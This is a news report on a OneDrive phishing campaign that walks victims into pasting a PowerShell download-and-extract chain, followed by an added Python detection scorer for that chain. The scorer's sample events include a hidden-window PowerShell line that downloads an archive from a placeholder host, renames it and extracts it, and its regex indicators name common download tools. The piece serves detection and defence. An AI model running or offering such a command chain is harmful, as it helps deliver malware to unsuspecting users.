
OneDrive Phishing Campaign Uses Malicious PowerShell Script


Microsoft OneDrive users in the U.S., South Korea, India, Germany, Ireland, Norway, Italy and the UK have been tricked into running a malicious PowerShell script that compromises their systems. The script is part of the OneDrive Pastejacking phishing and downloader attack campaign, The Hacker News reports.

Intrusions commence with the delivery of phishing emails with an HTML file, which, when clicked, prompts a OneDrive connection failure notice that includes "How to fix" and "Details" options, according to a Trellix analysis.

Targets who click "How to fix" are walked through several steps that result in the execution of ipconfig /flushdns and the creation of a 'downloads' folder on the C drive, into which an archive file is downloaded.

Such an archive file would then be renamed and have its contents extracted before script execution, said Trellix security researcher Rafael Pena. Proofpoint, ReliaQuest and McAfee previously reported similar phishing campaigns leveraging the ClickFix attack technique.
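From a detection standpoint, the chain described above (a DNS cache flush, a freshly created C:\downloads folder, an archive download, a rename and an extraction, all launched from a shell the user pasted into) is distinctive enough to score in process-creation telemetry. The following is an added example, not code from the article or from Trellix: a small Python scorer that weighs those indicators over constructed EDR/Sysmon-style events. The event shape, the indicator weights and the alert threshold are assumptions for illustration, and the URL and file names in the sample events are placeholders.

```python
import re

# Constructed sample process-creation events (not from the article or Trellix).
# Event 4101 mimics the chain the article describes: flushdns, a C:\downloads
# folder, an archive download, a rename and an extraction, run from a pasted
# command. The other two are benign look-alikes that should not alert.
SAMPLE_EVENTS = [
    {"pid": 4101, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": ('powershell.exe -w hidden -c "ipconfig /flushdns; mkdir C:\\downloads; '
             'iwr https://example.invalid/pkg.zip -OutFile C:\\downloads\\pkg.zip; '
             'ren C:\\downloads\\pkg.zip pkg.dat; Expand-Archive C:\\downloads\\pkg.dat C:\\downloads"')},
    {"pid": 4102, "parent": "cmd.exe", "image": "ipconfig.exe",
     "cmd": "ipconfig /flushdns"},
    {"pid": 4103, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\scripts\\nightly-backup.ps1"},
]

# Each indicator: (name, pattern, weight). Weights are an assumption for this
# example; tune them against a baseline of legitimate admin activity.
INDICATORS = [
    ("flushdns", re.compile(r"ipconfig(\.exe)?\s+/flushdns", re.I), 1),
    ("downloads_folder", re.compile(r"[a-z]:\\downloads\b", re.I), 1),
    ("archive_download", re.compile(
        r"\b(iwr|invoke-webrequest|curl(\.exe)?|wget|start-bitstransfer|downloadfile)\b"
        r".*\.(zip|7z|rar|cab|iso)\b", re.I), 2),
    ("rename", re.compile(r"\b(ren|rename|rename-item|move-item|mv)\b", re.I), 1),
    ("extract", re.compile(r"\b(expand-archive|tar\s+-x\w*|7z\s+x)\b", re.I), 1),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), 1),
]
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
USER_SHELL_PARENTS = {"explorer.exe"}  # Run dialog or pasted command
ALERT_THRESHOLD = 4  # assumed; a single indicator never alerts on its own


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    hits = [name for name, pat, _ in INDICATORS if pat.search(event["cmd"])]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # A shell host started directly by the desktop shell is how a pasted "fix"
    # command usually appears; it is weak evidence alone, so it only adds one.
    if (event["image"].lower() in SHELL_HOSTS
            and event["parent"].lower() in USER_SHELL_PARENTS):
        hits.append("shell_from_explorer")
        score += 1
    return score, hits


def detect(events, threshold=ALERT_THRESHOLD):
    """Return an alert record for every event whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev["pid"], "score": score, "indicators": hits})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The scoring is deliberately cumulative: a lone ipconfig /flushdns or a PowerShell script started from Explorer is routine, so neither alerts by itself, while the full sequence from one command line crosses the threshold easily. The same weights can be expressed as a SIEM correlation rule over the command-line field of process-creation events.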